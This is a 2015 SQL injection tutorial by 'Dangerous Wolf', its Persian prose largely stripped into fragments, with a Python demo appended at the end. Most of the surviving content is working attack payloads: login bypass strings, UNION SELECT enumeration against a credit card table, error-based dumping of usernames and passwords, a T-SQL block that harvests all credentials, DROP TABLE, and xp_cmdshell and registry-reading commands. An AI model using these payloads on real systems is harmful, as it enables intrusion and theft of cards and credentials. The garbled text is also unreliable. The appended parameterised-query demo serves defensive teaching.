SQL Injection Wolf

  • Published on
    11-Jun-2015


Structured Query Language Injection

SQL Injection Tutorial, Second Release, by Dangerous Wolf

: 0002 . 0002 . . 0202 . . . ( ) Tutorial SQL Injection . 003 . 001 . . 01 SQL Injection . . Injection . :

"James Marshall", the top admin of "Astalavista Security Committee"
"Adrian Lamo", "H4G1S Destroying Group", became WhiteHat
"Zinho", the top admin of "Hackers Center Committee"
"Steve Example", Gold Member of "Unix Wizard"
"IDESpinner", the top admin of "Cracking Is Life cracking-Team"
"Ali Rashidi", the top admin of "Crouz Security Team"

Page 1 of 77
SQL Injection Tutorial by Dangerous Wolf

1: Web Application Dynamic Content windowing . . Platform (SQL) Web Data Store Web Application (front-end-scripts) front-end SQL Query . web application hijacking . Query front-end scripts application . SQL Injection ! Database . Database Servers . (CC Info) . Microsoft SQL MSSQL (result) (Oracle DB Servers) Oracle . MSSQL (Market) Oracle !! Oracle . (!!) bug !

2: SQL Injection . . application ( ) ( ) SQL .

. Web Application . Web Server (! exception) exception '500: Internal Server Error' SQL syntax (: quote) application . exception . text HTML replace. / . redirect . (application code) application . Application . (200) redirect Internal Server Error replace. : application A B . application proddetails.asp . ProdID . (returned) . application proddetails.asp ProdID valid. Application A . ProdID ID insert recordset .

Application A recordset exception '500: Internal Server Error' . Application B recordset 0 . 'No such Product' . . SQL Injection . invalid application (!!!) SQL .

Application . SQL Injection : SQL SQL Keyword : OR, AND ... . META Character ; ' !! . Intercepting Proxy redirect . . SQL Injection. valid . injection . . SQL Injection exploit. SQL . pick of litter (!!!) SQL Injection .

SQL Injection SQL . SQL Number String Date . Injection . web application SQL Query ('abc' String, 4 number string). SQL quote . :

SELECT * FROM Products WHERE ProdID = 4
SELECT * FROM Products WHERE ProdName = 'Book'

SQL Server . SQL . Basic Arithmetic Operation . :

/myecommercesite/proddetails.asp?ProdID=4

SQL Injection . 4' . 1 + 3 . SQL . SQL :

(1) SELECT * FROM Products WHERE ProdID = 4'
(2) SELECT * FROM Products WHERE ProdID = 1 + 3

SQL . (ProdID 4) SQL Injection . SQL SQL Syntax String Expression . . quote breaking out quote . SQL Server (concatenation) . Microsoft SQL Server + Oracle || . . :

/myecommercesite/proddetails.asp?ProdName=Book

SQL Injection ProdName . B' + 'ook (B' || 'ook in Oracle) :

(1) SELECT * FROM Products WHERE ProdName = 'Book'
(2) SELECT * FROM Products WHERE ProdName = 'B' + 'ook'

SQL (book) Book. . (sysdate Oracle, getdate() SQL Server). SQL

SQL Injection .

. syntax .

Syntax SQL (Blindfolded) . . . . SELECT WHERE WHERE . WHERE ( ) . application OR 1=1 . . . application SQL (: OR 1=1 1000 application). WHERE OR, AND . : 'AND 1=2' . 'OR 1=2' . Operator Precedence WHERE . UNION SELECT WHERE . SQL . . AND 1=2, OR 1=1 SQL . (--) SQL Server (Ignore). User Name Password . :

SELECT Username, UserID, Password FROM Users WHERE Username = 'user' AND Password = 'pass'

johndoe' -- (User) WHERE :

WHERE Username = 'johndoe' --' AND Password = 'pass'

(bypass). WHERE :

WHERE (Username = 'user' AND Password = 'pass')

. (johndoe' --) :

WHERE (Username = 'johndoe' --' AND Password = 'pass')

. . (comment) . .

SQL . ( ) . . Oracle Microsoft SQL Server . . . WHERE . :

' AND 'xxx' = 'x' + 'xx

+ || Oracle MS SQL . ; . SQL ; SQL . SQL Injection Driver Oracle ; . comment ( ) ; MS SQL Oracle . ; COMMIT (: -- . xxx') : COMMIT . . :

getdate() MS SQL, sysdate Oracle

. SQL Injection . UNION SELECT .

UNION SELECT SELECT WHERE application . UNION SELECT . WHERE UNION SELECT . UNION SELECT . . . . UNION SELECT UNION ( ). UNION SELECT . UNION SELECT . .

UNION SELECT SQL Injection . UNION SELECT ( ). Column Number Mismatch Column Type Mismatch . . . ORDER BY . ORDER BY SELECT record-set . sort . ** . :

11223344) ORDER BY CCNum --

SELECT CCNum FROM CreditCards WHERE (AccNum=11223344) ORDER BY CCNum -- AND CardState=Active) AND UserName=johndoe

ORDER BY . . 11223344) ORDER BY 1 -- . CCNum . 11223344) ORDER BY 2 -- . ORDER BY . ORDER BY 1 . SELECT . . (sort application. ASC DESC). ORDER BY 1 100 (1000). . . . ( . ). .

. . . Brute Force . . : : 10 310 (60000) . 20 1 . . NULL Keyword SQL . ( ) NULL . UNION SELECT NULL . :

SELECT CCNum,CCType,CCExp,CCName FROM CreditCards WHERE (AccNum=11223344 AND CardState=Active AND UserName=johndoe)

CCNum . . (4) UNION NULL FROM Permission Error ((Permission Issues) handle). MS SQL FROM . Oracle DUAL . WHERE (: 1=2) WHERE record-set (NULL) (application NULL). MS SQL Server Oracle :

11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 --

WHERE :

SELECT CCNum,CCType,CCExp,CCName FROM CreditCards WHERE (AccNum=11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 -- AND CardState=Active) AND UserName=johndoe

NULL . UNION . UNION . UNION 100 (Vendor-Specific Table Name) (FROM). UNION NULL . (iteration) . . . CCNum UNION :

11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 --   No Error - Syntax is right. MS SQL Server Used. Proceeding
11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 --      No Error. First column is an integer
11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 --         Error! Second column is not an integer
11223344) UNION SELECT 1,'2',NULL,NULL WHERE 1=2 --       No Error. Second column is a string
11223344) UNION SELECT 1,'2',3,NULL WHERE 1=2 --          Error! Third column is not an integer
11223344) UNION SELECT 1,'2','3',NULL WHERE 1=2 --        No Error. Third column is a string
11223344) UNION SELECT 1,'2','3',4 WHERE 1=2 --           Error! Fourth column is not an integer
11223344) UNION SELECT 1,'2','3','4' WHERE 1=2 --         No Error. Fourth column is a string

UNION . . . ( ) .

3: SQL Injection : 1. 80 (HTTP) 2. 1434 (MS SQL)

: 80 : HTTP web . Web Designer . Query String . query ASP. browser . IE Netscape . Login Login Page (iranbin.com 1383/6/27): login.htm > "Login Page" 'a user name' 'a integer' :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin' to a column of data type int.
/process_login.asp, line 35

'admin' . user name 'where' :

Username: ' union select min(username),1,1,1 from users where username > 'admin'--

:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'chris' to a column of data type int.
/process_login.asp, line 35

: password user name

Username: ' union select password,1,1,1 from users where username = 'admin'--

:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'r00tr0x!' to a column of data type int.
/process_login.asp, line 35

single string password user name Transact-SQL Statement .. integer . string :

begin
  declare @ret varchar(8000)
  set @ret=':'
  select @ret=@ret+' '+username+'/'+password from users where username>@ret
  select @ret as ret into foo
end

:(' ) username'

Username: '; begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from users where username>@ret select @ret as ret into foo end

string 'ret' 'foo' . : sample

Username: ' union select ret,1,1,1 from foo--

:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ': admin/r00tr0x! guest/guest chris/password fred/sesame' to a column of data type int.
/process_login.asp, line 35

: drop

Username: '; drop table foo--

. (rich error info). .

. : 1- SQL Server . 2- Registry Keys SAM (SQL Server Local System Account). 3- . 4- . 5- SQL Server. 6- bulk insert . 7- bcp text file . 8- sp_OACreate, sp_OAMethod, sp_OAGetProperty (Active X) Ole Automation ASP . . . SQL Server SQL Injection. ( ):

[xp_cmdshell]: Extended Stored Procedure DLL Dynamic Link Library Compile SQL Server . Application SQL Server C/C++ . extended stored procedures SQL Server Built-In Registry . xp_cmdshell extended stored procedures Built-In . : SQL Server :

exec master..xp_cmdshell 'dir'

SQL Server (LOCAL SYSTEM ACCOUNT) (DOMAIN USER ACCOUNT) .

[xp_regread]: BUILT-IN extended stored procedures xp_regXXX. : xp_regaddmultistring, xp_regdeletekey, xp_regdeletevalue, xp_regenumkeys, xp_regenumvalues, xp_regread, xp_regremovemultistring, xp_regwrite . Share NULL-SESSION :

exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'

Community SNMP Configure . Community SNMP host (Shared Area) Reconfigure :

exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'

...
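As an added illustration (not part of the tutorial), the login bypass with `johndoe' --` and the `4'` / `1+3` probes described above, run in Python against a constructed SQLite database: the string-concatenated queries behave exactly as the tutorial describes, while the parameterised versions treat the same input as plain data and so give the defender nothing to detect by error or arithmetic. SQLite stands in for MS SQL Server; the table and column names follow the tutorial's examples, and the sample rows are constructed.

```python
import sqlite3


def make_db():
    # Constructed sample data (not from the tutorial); SQLite stands in for MS SQL Server.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Users(Username TEXT, UserID INTEGER, Password TEXT);
        INSERT INTO Users VALUES ('johndoe', 1, 's3cret');
        CREATE TABLE Products(ProdID INTEGER, ProdName TEXT);
        INSERT INTO Products VALUES (4, 'Book');
    """)
    return db


def login_vulnerable(db, user, pw):
    # String concatenation: the tutorial's  Username = '...' AND Password = '...'  query.
    # A username of  johndoe' --  closes the string and comments out the password check.
    sql = f"SELECT Username, UserID, Password FROM Users WHERE Username = '{user}' AND Password = '{pw}'"
    return db.execute(sql).fetchall()


def login_safe(db, user, pw):
    # Bound parameters: the input is passed as data and is never parsed as SQL.
    sql = "SELECT Username, UserID, Password FROM Users WHERE Username = ? AND Password = ?"
    return db.execute(sql, (user, pw)).fetchall()


def product_vulnerable(db, prod_id):
    # Numeric parameter pasted in without quotes, as in proddetails.asp?ProdID=4,
    # so ProdID=1+3 is evaluated by the database and returns the same row as ProdID=4.
    return db.execute(f"SELECT ProdName FROM Products WHERE ProdID = {prod_id}").fetchall()


def product_safe(db, prod_id):
    # Bound parameter: "1+3" is compared as a literal value, not evaluated; "4" still matches.
    return db.execute("SELECT ProdName FROM Products WHERE ProdID = ?", (prod_id,)).fetchall()


def quote_breaks_query(db, prod_id):
    # The tutorial's first probe: a stray quote (4') makes the concatenated query unparsable,
    # which is the database error the tutorial uses as an injection indicator.
    try:
        product_vulnerable(db, prod_id)
        return False
    except sqlite3.Error:
        return True


def demo():
    db = make_db()
    return {
        "bypass_vuln": login_vulnerable(db, "johndoe' --", "wrong"),  # row returned without the password
        "bypass_safe": login_safe(db, "johndoe' --", "wrong"),        # no row
        "arith_vuln": product_vulnerable(db, "1+3"),                   # same row as ProdID=4
        "arith_safe": product_safe(db, "1+3"),                         # no row: "1+3" is not 4
        "legit_safe": product_safe(db, "4"),                           # normal lookups still work
    }
```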